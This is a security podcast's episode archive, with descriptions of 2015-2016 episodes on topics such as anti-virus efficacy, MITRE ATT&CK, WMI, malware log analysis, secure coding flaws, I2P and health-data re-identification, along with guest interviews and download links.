Bill's "Reboot It" Podcast: http://www.rebootitpodcast.com/
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-004-Bill_Gardner.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-004-bill-gardner/id799131292?i=361222239&mt=2
Published on: January 24, 2016
#Anti-virus products... they have been around for as long as many of us have been alive. The first anti-virus program, "The Reaper", was written by Ray Tomlinson in 1971 to get rid of the first virus, 'The Creeper'.
This week, we discuss the efficacy of anti-virus. Is it still needed? What should blue teamers be looking for to make their anti-virus work for them? And what options do you have if you don't want to use anti-virus?
We also argue about whether it's just a huge industry selling snake oil, bolstered by #compliance #frameworks like #PCI.
#mcafee, #symantec, #panda, #avg, #kaspersky, #logging, #siem
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-003-AntiVirus_what_is_it_good_for.mp3
iTunes: https://goo.gl/Jk3CxU
Published on: January 18, 2016
This week, we find ourselves understanding the #Cryptonite that can weaken devs and software creators when dealing with #cryptographic #algorithms and #passwords. Lack of proper crypto controls and hardcoded passwords can quickly turn your app into crap.
Remember the last time you heard about a hardcoded #SSH private key, or have you been at work when a developer left the #API keys in his #github #repo?
We go through some gotchas from the excellent book "24 Deadly Sins of Software Security". Anyone doing a threat analysis, or code audit needs to check for these things to ensure you don't end up in the news with a hardcoded password in your home router firmware, like these guys: https://securityledger.com/2015/08/hardcoded-firmware-password-sinks-home-routers/
Book:
http://www.amazon.com/Deadly-Sins-Software-Security-Programming/dp/0071626751
Show Notes:
https://docs.google.com/document/d/1MUPj8CCzDodik61_1K8lCKywkv0JbfBkve20rxwbmzE/edit?usp=sharing
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-002-Cryptonite.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-002-cryptonite-or-how/id799131292?i=360440391&mt=2
Published on: January 11, 2016
#Jay #Schulman is a consultant with 15+ years of experience helping organizations implement #BSIMM and other compliance frameworks. For our first #podcast of 2016, we invited him on to discuss it further, and to share what he has found to be the best way to implement it in a company's #security #program.
Jay Schulman's #website: https://www.jayschulman.com/
Jay's Podcast "Building a Life and Career in Security" (iTunes): https://itunes.apple.com/us/podcast/building-life-career-in-security/id994550360?mt=2&ls=1
Jay's Twitter: https://twitter.com/jschulman
iTunes Link: https://itunes.apple.com/us/podcast/2016-001-jay-schulmann-explains/id799131292?i=360028388&mt=2
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-001-JaySchulman-BSIMM.mp3
Published on: January 3, 2016
Dave Kennedy does a lot for the infosec community. As owner/operator of 2 companies (Binary Defense Systems and Trusted Security), he is also an organizer of #DerbyCon and an active contributor to the Social Engineering ToolKit (#SET). You can also find him discussing the latest hacking attempts and breaches on Fox News and other mainstream media outlets.
But this time, we interview Dave Kennedy because he has been elected to the ISC2 board. He will be serving a 3 year term with Wim Remes (who we interviewed a couple of weeks ago) and others to improve #ISC2 processes, and to make #CISSP and other certs more competitive in the #infosec/IT community.
And yes... we find out about what is going on with DerbyCon and get some updates with what will happen in the next DerbyCon.
iTunes Link: https://itunes.apple.com/us/podcast/2015-054-dave-kennedy/id799131292?i=359677576&mt=2
Published on: December 27, 2015
This week, we went off the tracks a bit with our friends at Defensive Security Podcast and PVC Security Podcast. We discussed a bit of news, talked about how our podcasts differ from one another and the 'lack of infosec talent', and sat around talking about anything we wanted to.
Sit back with some eggnog, and let your ears savor the sounds of the season. Many thanks to Andrew Kalat, Jerry Bell, Edgar Rojas, Paul Jorgensen, and co-host Brian Boettcher for getting together for some good-natured fun.
WARNING: There is adult language, and themes, so if you have little ones around, you might want to skip this one until after bedtime.
Happy Holidays from Brakeing Down Security Podcast.
Published on: December 22, 2015
I got a hold of Mr. Wim Remes, because he was elected to the ISC2 board in November 2015. Recent changes to the CISSP included reducing the long-standing 10 domains to 8 domains, plus a major revamp of all of them.
I wanted to know what Mr. Remes' plans were for the coming term, how the board works, and how organizations like ISC2 drive change in the industry. I also asked Wim how he is trying to ensure that CISSP and the other certs are going to remain current and competitive.
This is a great interview if you're looking to get your #CISSP or any other ISC2 cert, or you currently have an #ISC2 #certification and want to get knowledge of the workings of ISC2 and the board.
Mr. #Remes' Twitter: @wimremes
ISC2 official site: http://www.isc2.org
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-052-wim_remes-isc2.mp3
iTunes: https://itunes.apple.com/us/podcast/2015-052-wim-remes-isc2-board/id799131292?i=359103338&mt=2
Published on: December 17, 2015
#MITRE has a Matrix that classifies the various ways that your network can be compromised. It shows all the post-exploitation categories, from 'Persistence' to 'Privilege Escalation'. It's a nice way to organize all the information.
This week, Mr. Boettcher and I go over the "#Persistence" and "#Command and #Control" sections of the Matrix.
Every person who attacks you has a specific method that they use to get and keep access to your systems; it's as unique as a fingerprint. Threat intelligence companies call it TTP (#Tactics, #Techniques, and #Procedures). We also discuss the Cyber #KillChain, and where it came from.
#ATT&CK Matrix: https://attack.mitre.org/wiki/Main_Page
Tactics, Techniques, and Procedures (shows patterns of behavior) https://en.wikipedia.org/wiki/Terrorist_Tactics,_Techniques,_and_Procedures
http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-White-Paper-Intel-Driven-Defense.pdf -- Cyber Kill Chain paper that inspired the ATT&CK Matrix
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-051-ATTACK_Matrix.mp3
iTunes: https://itunes.apple.com/us/podcast/2015-051-mitres-att-ck-matrix/id799131292?i=358670845&mt=2
Published on: December 10, 2015
That's the question many think is an automatic 'yes'. Whether your Httpd is running on port 82, or maybe your fancy #wordpress #module needs some cover because the code quality is just a little lower than where it should be, and you need to cover up some cruft.
This week, Mr. Boettcher and I discuss reasons for obscuring for the sake of #security, when it's a good idea, and when you shouldn't #obscure anything (hint: using #ROT-14, for example).
#encryption #infosec
Show Notes: https://docs.google.com/document/d/1PioC2hnQHhm5Xd1SCT4ewvZmZiLcE5pGQuif4Tuk_zE/edit?usp=sharing
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-049-Security_by_Obscurity.mp3
Published on: December 4, 2015
Cheryl Biswas gave a great talk last month at Bsides Toronto. I was intrigued by what "Shadow IT" and "Shadow Data" mean, as there appears to be some disparity. Why can't you write policy to enforce standards? As easy as it sounds, it's quickly becoming a reason young talented people might skip your company. Who wants to use Blackberries and Gateway laptops, when sexy new MacBook Airs and iPhone 6S exist?
This also leads to the issue of business data being put on personal devices, which, as anyone knows, can cause a whole host of additional issues. Malware installed on personal devices can make sharing business secrets a cinch.
So, while Mr. Boettcher was working, I managed to wrangle a quick interview with Cheryl out of her offices in Toronto, Ontario.
Cheryl gave us some great audio, and when you're done, you can watch her Bsides Toronto talk.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-048-Cheryl_Biswas_Shadow_IT.mp3
iTunes Link: https://itunes.apple.com/us/podcast/2015-048-rise-shadow...-it!/id799131292?i=357889684&mt=2
Cheryl's Twitter: https://www.twitter.com/3ncr1pt3d
Cheryl's BsidesTO talk: https://www.youtube.com/watch?v=q0pNWpWFKBc
Published on: November 27, 2015
Business Security in Maturity Model (#BSIMM) is a #framework that is unique in that it gives your company a measuring stick to know how certain industry verticals stack up against yours...
We didn't want to run through all 4 sections of the BSIMM, so this time we concentrated on the #software #security standards, the "Deployment" section specifically...
BSIMM V6 download (just put junk in the fields, and download ;) ): https://www.bsimm.com/download/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-047_BSIMM.mp3
iTunes: https://itunes.apple.com/us/podcast/2015-047-using-bsimm-framework/id799131292?i=357545342&mt=2
Published on: November 21, 2015
During our last podcast with Bill Sempf (@sempf), we were talking about how to get developers to understand how to turn a vuln into a defect and how to get a dev to understand how vulns affect the overall quality of the product.
During our conversation, the term "ASVS" came up, so we did a quick and dirty session with Bill about it. It's a security #requirements #document that ensures that projects being scoped out meet specific security requirements. This can be a valuable ally when your company is creating products or software applications. Bill explains this week exactly how you incorporate it into your Secure #SDLC #lifecycle.
#project #management #security #architect
Direct Link: http://traffic.libsyn.com/brakeingsecurity/sempf2.mp3
iTunes Link: https://itunes.apple.com/us/podcast/2015-046-getting-security/id799131292?i=356958476&mt=2
Bill's Bside Columbus talk on ASVS: http://www.irongeek.com/i.php?page=videos/bsidescolumbus2015/defense00-got-software-need-a-security-test-plan-got-you-covered-bill-sempf
Bill's Blog: http://www.sempf.net
Bill's Twitter: http://www.twitter.com/sempf
Published on: November 10, 2015
When you receive a #pentest or vuln scan report, we think in terms of #SQLi or #XSS. Take that report to your dev, and she/he sees Egyptian hieroglyphics, and we wonder why it's so difficult to get devs to understand.
It's a language barrier, folks. They think in terms of defects, or how something will affect the customer experience. We think in terms of #vulnerabilities, and what caused the issue. We need to find that common ground, and often that will mean us heading into unfamiliar territory. It doesn't have to be 'us vs. them'. We are supposed to be a team.
Join us this week as we discuss that very topic with Bill #Sempf. Bill has spent nearly 25 years doing software development and security, working as an independent contractor for dozens of companies on hundreds of #software #projects. He helps us figure out how to speak 'dev', and to develop a mindset that will ensure you can get the most out of interactions with developers and coders.
Show notes: http://brakeingsecurity.com/2015-045-care-and-feeding-of-devs-podcast-edition-with-bill-sempf
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-045_Bill_Sempf-care_and_feeding_of_devs.mp3
Itunes: https://itunes.apple.com/us/podcast/2015-045-care-feeding-devs/id799131292?i=356366452&mt=2
Bill's #DerbyCon Talk "#Developers: Care and Feeding":
Bill's Blog: https://sempf.net/
Bill's Twitter: http://www.twitter.com/sempf
Published on: November 4, 2015
It's a madhouse this week! We invited Ben Donnelly (@zaeyx) back to discuss a new software framework he's crafted, called #MAD Active Defense. Ben wants to make Active Defense simple enough for even the busiest blue teamer.
The interface takes its design from other well-known #software frameworks, namely #Metasploit, #Recon-ng, and even a bit of #SET, he said.
We even did a quick demo of MAD, discussed the tenets of #Active #Defense, and talked about a little skunkworks project of Ben's that you will find enjoyable.
Direct Link: http://brakeingsecurity.com/2015-044-a-mad-mad-mad-mad-world-with-ben-donnelly
Promethean Security MAD GitHub: https://github.com/PrometheanInfoSec/MAD
Demo Video (~110MB): http://traffic.libsyn.com/brakeingsecurity/MAD_Ben_edited.mkv
Backup Demo Download (gDrive) site (~110MB): https://goo.gl/FtWlCM
#activeDefense #blueTeam #intrusionDefense #benDonnelly
Published on: October 30, 2015
WMI (Windows Management Instrumentation) has been a part of the Windows Operating system since Windows 95. With it, you can make queries about information on hosts, locally and even remotely.
Why are we talking about it? Admins in the enterprise rarely use it, but bad actors increasingly use it to move laterally. It's highly versatile, can be scripted, and can even be set up to trigger actions when other programs run on a system.
Mr. Boettcher and I sit down and discuss the functions of #WMI, its history, what classes and objects are, and ways you can leverage WMI to make your admins' job much easier.
#assetmanagement #remotemanagement #wbem #wmi #windows
Wbemtest: http://blogs.technet.com/b/chad/archive/2012/03/08/tip-45-wbemtest-the-underappreciated-tool.aspx
WMI documentation: https://msdn.microsoft.com/en-us/library/aa384642(v=vs.85).aspx
Show notes
Published on: October 22, 2015
Just before #Derbycon, we invited Michael Gough (@hackerhurricane) to join us on the #podcast.
For the last 3-4 months, my co-host Brian and he were engaged in the creation of a software tool that would make #log #analysis of #windows systems quicker, and together they have achieved that with "Log-MD", short for Log Malicious Discovery.
#Malware and #bots on an infected host always leave a fingerprint of what they are doing behind. This software takes your system, configures it to get the maximum #logging output possible, then puts everything in a nice readable format, enabling you to filter out known good items and leaving you with bad items or suspicious activity. This allows you to analyze #logfiles and find malware in less time than before, which will make #forensics of infected systems faster and more economical.
We do some discussion of #Log-MD, and then we have Michael demo LOG-MD for us.
Video demo: https://youtu.be/0_J90sOVY8c
log-MD site: http://log-md.com/
iTunes: https://itunes.apple.com/us/podcast/2015-042-log-md-more-malware/id799131292?i=354715938&mt=2
Published on: October 14, 2015
In our last bit of Derbycon audio, I discussed DerbyCon experiences with Mr. Boettcher, Magen Wu (@tottenkoph), Haydn Johnson (@haydnjohnson), and Ganesh Ramakrishnan (@hyperrphysics). We find out what they liked, what they didn't like, and you get a lot of great information about packing for a con, things you can do to improve your convention going experience.
Hopefully, you'll hear the amount of fun we had, and find the time to go to a convention. There are literally hundreds, many only a few hours away by plane. Some can be found in your own town or within driving distance.
Published on: October 10, 2015
Mr. Boettcher and I attended Derbycon, and while he was out attending talks, I got invited to do a podcast with some of the other podcasts who were there. Special thanks to Edgar Rojas, Amanda Berlin, Jerry Bell, Andrew Kalat, Paul Coggin, Tim DeBlock, and everyone else at our recording. We have a bit more audio that we will post this month, including a discussion of a tool Mr. Boettcher and Michael Gough collaborated on to make Windows malware analysis easier to do.
Published on: September 30, 2015
Last week, we discussed HTML5 with Shreeraj Shah: how it came into being, and the fact that instead of solving OWASP issues, it introduces new and wonderful vulnerabilities, like exploiting locally stored web site info using XSS techniques, and doing SQLi against the browser's new WebSQL database.
So this week, it's all about defensive techniques that you can use to educate your developers against making mistakes that could get your company's web application on the front page of the newspaper.
Published on: September 21, 2015
Shreeraj Shah (@shreeraj on Twitter) came on this week to give us a run-down of some of the issues with HTML5. How can a new standard actually be worse than something like Flash? And why would a standard not address existing OWASP issues, and even create new issues, like the ability of a browser to have a database inside of it managing everything?
This week we discuss HTML5 history, some of the pitfalls, and discuss some of the new technologies found in HTML5 that will create more headaches for agents of infosec.
Published on: September 14, 2015
When we wanted to have Martin Fisher on, it was to discuss 'Security Mandate vs. Security Influence'. We wanted to discuss why companies treat compliance as more important, and if it's only because business requires it to be done. And if infosec is a red-headed stepchild because they often don't have the guidance of a compliance framework.
But it ended up going in another direction, with Martin discussing infosec leadership, and how we as agents of infosec should be 'guardrails' instead of 'speed bumps' to business processes and people. It was a great discussion from a veteran healthcare CISO, especially if you're thinking of pursuing a CISO or CSO management track.
https://www.manager-tools.com/ -- Manager Tools podcast
Published on: September 7, 2015
Once you find a vulnerability, how do you handle patching it? Especially when devs have their own work to do, there are only so many man hours in a sprint or development cycle, and the patching process could take up a good majority of that if the vuln is particularly nasty.
One method is to triage your patches, and we discuss that this week with Mr. Boettcher. We also talk about how our respective companies handle patching of systems.
We also discuss what happens when compensating controls run out of effectiveness, and if there is a point at which they no longer are 'compensating' for anything any further.
Published on: August 31, 2015
Checkbox Security... checklists that compliance people require you to follow, and many security people have to fall in line, because they often have no choice.
But what if there was a way to use compliance requirements to get beyond the baseline of PCI/SOCII/HIPAA, and get to be more secure?
Magen Wu (@tottenkoph), Mr. Boettcher, and I spent a bit of time discussing just that. We discuss basic issues with compliance frameworks, how to get management to buy in to more security, and even how you can get Compliance people to help without them knowing it.
Published on: August 24, 2015
After last week's discussion of end-user training in the SANS top 20 security controls, we realized that it would be great to discuss how a company involved in training does proper training.
So we hit up our sponsor at Cybrary.it to discuss their end-user security training track and how companies can use it to help their employees to be more secure in their workplace.
We end the podcast with a bit of audio from the Bsides Austin blue/red panel Mr. Boettcher moderated. He asked them about training and its worth. The first answer, from Justin Whitehead, is telling as to how he believes training will fail regardless. His answer was chilling, in fact, and we hope to continue that conversation with him in the future.
Published on: August 16, 2015
For long-time listeners of the podcast: back when Brian and I wanted to do the podcast, we were working at the same company, and the first podcast we did was on hashes.
Bob story: Bob was getting tired of explaining what MD5, SHA1, SHA2 were to developers, so as we were developing our idea for the podcast, this was the first episode we had. Mr. Boettcher had several ideas for podcasts prior to that.
I was actually gonna go it alone, but wanted him to join me. Thankfully, he broached the idea of being on the podcast. This was actually the second take, as the first one was done in our office and we didn't want any legal issues doing it at work, so we trashed that one and made this version. I thought the first take was better, but what are you gonna do... :)
Published on: August 15, 2015
End User training. Lots of companies have need of regular security training. Many treat it as a checkbox for compliance requirements, once a year. With the way training is carried out in many organizations, is it any wonder that phishing emails still get clicked, passwords still get compromised, and sensitive information is still leaked?
We discuss methods to make training more effective, and how to make people want to do training.
Finally, we discuss Capture-The-Flag competitions, and why it would behoove blue team people to attempt them. They become a great barometer for understanding your shortcomings, and what you as a blue teamer might need to study up on...
Published on: August 10, 2015
Katherine Carpenter is a privacy consultant who has worked all over the world helping to develop guidelines for ethical medical research and sharing of anonymized data, and helping companies understand privacy issues associated with storing and sharing medical data.
This week, we discuss how companies should assign value to their data, the difficulties of doing research with anonymized data, and the ramifications of research organizations that share data irresponsibly.
email contact: [email protected]
http://jama.jamanetwork.com/article.aspx?articleid=192740
https://depts.washington.edu/bioethx/topics/consent.html
https://en.wikipedia.org/wiki/De-anonymization
https://en.wikipedia.org/wiki/Data_anonymization
https://en.wikipedia.org/wiki/De-identification
https://en.wikipedia.org/wiki/International_Safe_Harbor_Privacy_Principles
http://www.nature.com/news/privacy-protections-the-genome-hacker-1.12940
http://www.hhs.gov/ocr/privacy/hipaa/understanding/coveredentities/De-identification/guidance.html
https://en.wikipedia.org/wiki/Information_privacy_law
http://www.theguardian.com/technology/2015/apr/06/data-privacy-europe-facebook
http://www.theguardian.com/technology/2015/jun/15/eu-privacy-laws-data-regulations
http://fusion.net/story/171429/app-genetic-access-control-genes-dna-for-password/
###
Katherine’s note, comment, and links.
It is good to be thinking about de-identification (especially regarding health care data)
I think a better question to ask is how easy is it to re-identify information that has been de-identified. The HIPAA rule has 18 Identifiers which count as Personally Identifiable Information (PII) or Personal Health Information (PHI); these include birth date, zip code, and IP address. When data is collected in non-health contexts, these identifiers are not considered PII/PHI (for example: this kind of information can be used for marketing purposes or financial/credit-related purposes).
A brief history on the topic:
In 1997 a precocious grad student IDed the Governor of MA using purchased voter records to reID deIDed health information that was released. (This study was one motivator to pass HIPAA.) Further research along the same lines of the previous project can be summed up with a simple and scary statistic: in 2000, 87% of Americans may be uniquely identified by combining zip code, birthday and sex (gender).
For this reason, health information is threatened not only by deID’n & reID’n, but by the combination of and other types of information that are publicly available or available for purchase and could reveal things about an individual that would contribute to reID of individual’s health info.
Here are a bunch of articles that discuss the topic from different angles.
http://arstechnica.com/tech-policy/2009/09/your-secrets-live-online-in-databases-of-ruin/
https://datafloq.com/read/re-identifying-anonymous-people-with-big-data/228
https://epic.org/privacy/reidentification/
http://news.harvard.edu/gazette/story/2011/10/you%E2%80%99re-not-so-anonymous/
Dwork, C. and Yekhanin, S. (2008), “New Efficient Attacks on Statistical Disclosure Control Mechanisms,” Advances in Cryptology—CRYPTO 2008, to appear, also at http://research.microsoft.com/research/sv/DatabasePrivacy/dy08.pdf
Is Deidentification Sufficient to Protect Health Privacy in Research?
Mark A. Rothstein: http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3032399/
In an incident response, the need for clear communication is key to effective management of an incident. This week, we had Mick Douglas, DFIR instructor at SANS, and Jarrod Frates, who is a pentester at InGuardians, and has great experience handling incidents. Find out some roles in an incident response (the Shadow, the event coordinator, the lead tech), and how companies should have an IR plan that handles various 'incident severities'.
Jarrod updates us on "TheLab.ms" and how you might like to help them!
Finally, we are holding a contest to win a ticket to DerbyCon; full instructions are below. We are giving away two tickets.
DerbyCon 1st Ticket contest expires 31 July 2015.
1. To enter for a ticket to DerbyCon
a. A donation must be made to Hackers for Charity (http://www.hackersforcharity.org/)
b. Once the donation is made, email your receipt of your donation to [email protected]
c. If you win: We will contact you by the email you mailed the receipt from with our contact information. You will need to contact us when you get to DerbyCon, as we will not send you the ticket directly. You will also be responsible for airfare and accommodations at DerbyCon.
Published on: July 26, 2015
Strap yourselves in, Ladies and Gentlemen. With Mr. Boettcher gone on "vacation" this week, I needed some help with the podcast, and boy did we pick a doozy. If you're a fan of Turing Complete algorithms (frankly, who isn't ;) ), we had Ms. Fabienne Serrière (@fbz) and Ms. Magen Wu (@tottenkoph), who discuss higher order math and psychology on our podcast this week.
We also discuss a little project management and even talk about why proper survey sizes and getting a good cross-section is important.
Be sure to pick up one of Ms. Fbz's scarves, especially if you're a math nut and love fractals and patterns as I do.
Kickstarter: https://www.kickstarter.com/projects/fbz/knityak-custom-mathematical-knit-scarves
Elementary Cellular Automaton : http://mathworld.wolfram.com/ElementaryCellularAutomaton.html
Turing Complete: https://en.wikipedia.org/wiki/Turing_completeness
Sierpinski Triangle: https://en.wikipedia.org/wiki/Sierpinski_triangle
Chomsky Hierarchy: https://en.wikipedia.org/wiki/Chomsky_hierarchy
Hammer/LangSec: https://github.com/UpstandingHackers/hammer
Sergey Bratus: http://www.cs.dartmouth.edu/~sergey/
Stego Hats: http://www.ravelry.com/projects/fbz/pseudo-random-reversible-hat
SeaSec East: http://www.meetup.com/SEASec-East/
Published on: July 18, 2015
My podcast co-host Brian Boettcher, along with Kate Brew, an Austin, TX based security blogger, headed up this panel called "Red Team Vs. Blue Team". The idea was to ask people from various sides of the aisles (attackers and defenders) pressing questions about how the industry operates.
Infosec heavyweights like Kevin Johnson (@secureideas), Mano Paul (@manopaul), Josh Sokol (@joshSokol), made this a very excellent podcast...
We hope you enjoy!
Published on: July 13, 2015
Roxy, who we interviewed a few months ago on our podcast about hackerspaces, is back with us this week to discuss a project she is working on, called 'Big Brown Cloud'. If you've ever wanted to set up your own fake blog and send people to it to gain information on possible attacks, you've come to the right place.
We also get an update on the hackerspace that Jarrod, Sean, and Roxy were getting set up a few months ago. They've come a long way, and they are about to move into their new facility.
https://thelab.ms/
Published on: July 6, 2015
In this podcast, you'll learn about:
Log analytics software that can be used to parse system logs for nasty malware
Detecting malware artifacts
Windows directory locations
Looking for indicators like packing, changed hashes, etc.
Tips for capturing malware using tools like RoboCopy
What code caves are and how malware hides inside them (http://www.codeproject.com/Articles/20240/The-Beginners-Guide-to-Codecaves)
SANS DFIR poster - https://www.sans.org/security-resources/posters/windows-forensics-evidence-of-75
Published on: June 29, 2015
Michael Gough joined us again to discuss malware detection techniques on Windows systems. We talk about how you can modify PowerShell's defaults to allow for better logging potential. Also, we find out some hidden gems that pretty much guarantee to let you know that you've been infiltrated.
Stay for the PowerShell security education, and you also learn some new terminology, like "Malware Archaeology", Malwarians, and 'Log-aholic', to name a few...
Published on: June 22, 2015
This week, we discuss various methods of enabling companies to move applications to cloud-based platforms.
We discuss containers, like Docker, and how various hosting services handle converting businesses from a traditional data center to a secure, cloud-based entity.
We even discuss securing the data in the cloud, preventing bad guys from accessing it, as well as the cloud provider themselves, who can be served with a subpoena to hand over data.
Brakeing Down Security would like to thank FireHost for allowing Chase and Mike to join us.
Published on: June 14, 2015
With last week's revelation from Microsoft that they will support SSH, understanding PowerShell has become more important than ever as a tool to be used by blue teamers, both for administration, and to understand how bad guys will use it for nefarious deeds on your network.
Part 2 of our interview with Mick Douglas discusses a bit more about the DEV522 class that he teaches for SANS, and why it seems that blue team (defenders) are not getting the training they should. By being deficient in necessary skills, the knowledge gap between bad guys and defenders widens.
Published on: June 8, 2015
We had the opportunity to discuss with Mick Douglas the fact that there is a stigma of blue team always being on the losing end of security. Is it because there are more tools for the pentesters or bad guys, or that it takes a massive IT budget to be secure? We don't believe so... Great insights into how a blue team can protect their network.
Published on: May 31, 2015
Having a more secure network by deploying tools can be no easy task. This week, we show you a tool, Security Onion, that can give you an IDS and log analysis tool in less than 20 minutes.
http://blog.securityonion.net/p/securityonion.html
Published on: May 26, 2015
When you're working with network infrastructure, there's a real need for proper configuration management, as well as having a proper baseline to work from.
Mr. Boettcher and I continue through the SANS Top25 Critical Security Controls. #10 and #11 both deal with network infrastructure: proper patches and baselines for being as secure as possible, since your company's ideal security structure needs to be a 'brick', and not an 'egg'.
Published on: May 17, 2015
We continue our journey on the 24 Deadly Programming Sins. If you listened to last week's podcast, we introduced the book we were using as a study tool:
http://www.amazon.com/Deadly-Sins-Software-Security-Programming/dp/0071626751
This week is on command injection. We first discussed command injection as part of our OWASP Top 10 for 2013, but you'll be surprised just how easily devs create conditions in their code that allow for command injection.
Published on: May 10, 2015
At DerbyCon last year, Mr. Boettcher did a microcast with Johnny Long, an inspirational human being who left a life many infosec professionals dream of, and went to Africa to help disadvantaged people make a better life with access to technology.
Where is the audio, you ask? Well, we've posted it on our Patreon so that patrons can have first dibs on it. We'll post it here this weekend for everyone.
He is a great individual and we hope you'll enjoy it.
Published on: May 8, 2015
Code audits are a necessary evil. Many organizations resort to using automated tools, but tools may not find all issues with code. Sometimes, you need to take a look at the code yourself.
Mr. Boettcher and I begin going through the book "24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them". What we covered this week is "buffer overruns": we discuss what they are, and how they occur.
Get ready for a crash course in code audits. The book is not required, but it definitely helps when we are discussing concepts.
We also mentioned our new Patreon account, so if you are a listener, and want to support what we do, you can give on a per month schedule. Donations are entirely optional, and if you don't wish to give, that's fine too.
24 Deadly Sins on Amazon:
Published on: May 3, 2015
When you're faced with major projects, or working to understand why your IDS fails every day at the same time, there must be a way to work that out. Or when you must do the yearly business continuity failover, you need a process oriented framework to track and ensure changes are committed in a sane, orderly manner.
ITIL is a completely versatile, flexible framework that scales with your organization. You can also use it with your software development lifecycle. You can use it to enhance major projects and security initiatives.
Tim Wood joins us for the second part of his interview. We discuss Change Management, Problem Management and making inter-departmental SLAs a reality for proper management of changes.
Tim Wood's Presentation: https://drive.google.com/file/d/0B-qfQ-gWynwiVS0zLTZidml0VzA/view?usp=sharing (view only)
Published on: April 26, 2015
Much of InfoSec and Compliance is all about processes, procedures, controls, audits, and the proper management of all of these. To do so, you need a proper framework to make these as seamless as possible. ITIL is one of these types of frameworks.
We introduce Mr. Tim Wood on the podcast, who has over 20 years of ITIL experience and began ITIL implementations in banks and healthcare systems in the United Kingdom. He currently works with different industries to change culture and make ITIL a reality.
This week, we go over the history of ITIL, and understand the various incarnations from v1.0 to v3.0. You quickly understand where security will start fitting into all those facets of the ITIL framework.
Tim Wood's Presentation: https://drive.google.com/file/d/0B-qfQ-gWynwiVS0zLTZidml0VzA/view?usp=sharing (view only)
Published on: April 18, 2015
Special interview this week! On the heels of their uber successful KickStarter campaign, we brought co-founder Ryan and one of the technical editors, Anthony, in to discuss what Cybrary is. We also discuss ways you can leverage it in your own business to get quality security awareness training, as well as train up your employees on infosec topics that can benefit your company and employees. You can find out more at http://www.cybrary.it
Published on: April 7, 2015
It's that time of year again... when all the reports come out that show how various industries did over the last year.
Brakeing Down Security went over the results of the Verizon PCI report. Did companies do worse this year, or could they have actually improved? Listen to our analysis, and what companies can do to learn from this, and how you can use this report to help get a leg up when your QSA comes calling.
http://www.verizonenterprise.com/pcireport/2015/
Pay IRS using "Snapcard": http://www.coindesk.com/pay-taxes-bitcoin-snapcard-pay-irs/
According to the US Internal Revenue Service (IRS), virtual currencies are treated as "Property": http://www.irs.gov/uac/Newsroom/IRS-Virtual-Currency-Guidance
Published on: April 4, 2015
We continue our trek down the list of SANS Top 20 Critical Security Controls this week with #12 and #13 - Boundary Defense, and Controlled Use of Administrative Privileges. Learn what you can do to shore up your network defenses, and how to handle admin privileges... when to give that kind of access, and how to make privileged access as secure as possible while still allowing administrators to do their work.
https://www.sans.org/media/critical-security-controls/CSC-5.pdf
http://www.openspf.org/
https://4sysops.com/
Published on: March 28, 2015
We invited the organizers of "TheLab.ms", a Dallas, Texas based hacker/makerspace, on the podcast to talk about why they wanted to start a makerspace, the costs and plans to set up a hacker space, and some of the things you can do with a makerspace. We also come to understand the sense of community and the learning environment gained from these places.
If you are looking to start a 'space in your area, or looking to understand why they are needed in a community, you'll want to listen to Roxy, Sean, and Jarrod talk about the highs and lows and even some of the gotchas in setting up a space.
Published on: March 21, 2015
Mr. Boettcher went on vacation and was volunteering for Austin Bsides this week, and I needed to do a podcast, so I enlisted the aid of Lee Brotherston and Jarrod Frates to discuss some important topics. We discuss the seemingly short talent pool for IT/IS positions. We talk about the ROWHAMMER vulnerability and how it may affect your organization. Additionally, we talk about how the NTP protocol is being maintained by one person and what can be done to help with that, as it is a critical piece of Internet infrastructure, and finally, we figure out why PGP/GPG is not user-friendly, and if there are ways to make it better, or if it needs to be replaced permanently.
News of the week
RowHammer -
http://www.darknet.org.uk/2015/03/rowhammer-ddr3-exploit-what-you-need-to-know/
Lack of hire-able people in IT/IS - per Leviathan Sec report. https://www.leviathansecurity.com/blog/scarcity-of-cybersecurity-expertise/
NTP maintained by one guy ‘Father Time’
http://www.informationweek.com/it-life/ntps-fate-hinges-on-father-time/d/d-id/1319432
Moxie Marlinspike’s GPG/PGP rant: Perfection ruined the goal http://www.thoughtcrime.org/blog/gpg-and-me/
Published on: March 15, 2015
In our continuing discussion with Jeff and "Str4d", we got right to the heart of the matter: Privacy and anonymity.
If you're trying to remain anonymous, what steps do the devs of I2P take to keep themselves as anonymous as possible? We also touch on what the "Browser Exploitation Framework" is, and why it scares the heck out of Jeff.
Finally, I ask them if there are any real 'good' sites on I2P. Because the media seems to latch on to any story where we hear the bad things about any anonymizing network, is there a way we can improve the image of anonymizing networks?
*** If you have a blog, and it's about security/privacy/compliance, please consider adding us as a write-in for '2015 Best New Security Podcast' here:
https://www.surveymonkey.com/s/securitybloggers***
Show notes: https://docs.google.com/document/d/1Vh0HiUDXchesI2-BlthztoIIswZa0GZa_Jg0mOu0ao4/edit?usp=sharing
Published on: March 7, 2015
Mr. Boettcher got a hold of the developers and maintainers of the anonymizing network "I2P". We talked with "str4d" and "Jeff" this week.
In Part 1 of the interview, we discuss the technical aspects of I2P, how it functions, how 'garlic routing' works, and how the floodfill servers allow I2P to function effectively.
In the final segment, we discuss form factors, specifically if I2P is available for embedded systems like Raspberry Pi.
If you find Tor not to your liking, give I2P a try... its goals are the same, but the methods of security and privacy are different. Plus, as you can hear from the podcast, it's very much a tight-knit community of security and privacy enthusiasts.
Show notes, links, and contact info:
https://docs.google.com/document/d/1Vh0HiUDXchesI2-BlthztoIIswZa0GZa_Jg0mOu0ao4/edit?usp=sharing
Published on: February 28, 2015
The second part of our interview with Pawel discussed content management systems, and how you can integrate CSP in Drupal, Django, and the like.
Content managers, you'll want to listen to this, especially about how CSP can help you secure the content on your systems, as well as protect customers from web-based attacks using the sandboxing functions of CSP.
